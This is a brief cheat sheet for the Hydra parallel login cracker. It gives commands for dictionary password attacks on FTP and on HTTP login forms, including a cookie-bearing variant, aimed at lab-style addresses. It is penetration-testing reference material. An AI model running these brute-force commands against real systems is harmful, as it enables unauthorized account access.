Hydra

thc.org

Introduction

Hydra is a parallelized login cracker which supports numerous protocols to attack. It is very fast and flexible, and new modules are easy to add. This tool makes it possible for researchers and security consultants to show how easy it would be to gain unauthorized access to a system remotely.

Installation

# sudo apt-get install hydra -y

Usage

Ftp

$ hydra -t 10 -V -f -l root -P wordlisst/rockyou.txt ftp://127.0.0.1

Http form

$ hydra -l admin -P /path/to/passwordlist 10.10.10.10 http-post-form "/index.php:user=^USER^&pass=^PASS^:Wrong Password!"

Http form without user

$ hydra -l '' -P /path/to/passwordlist 10.10.10.10 -s 3365 http-post-form "/:password=^PASS^:Invalid Password!"

-t = How many parallel attempt at a time(1/5/10/100 ?). Don’t use too much otherwise you will get false result
-V = Show output
-f = Stop when found the password.
-l = The Username (-L for username from file)
-P = Dictionary file

If you want to attack same with Cookie then use following:

$ hydra -l '' -P /path/to/passwordlist 10.10.10.10 -s 3365 http-post-form "/:password=^PASS^:Invalid Password!:H=Cookie:PHPSESSID=dnpbasdjtas6dui"

To see full list of help

# hydra --help

Useful Links

sectools.org/tool/hydra
tools.kali.org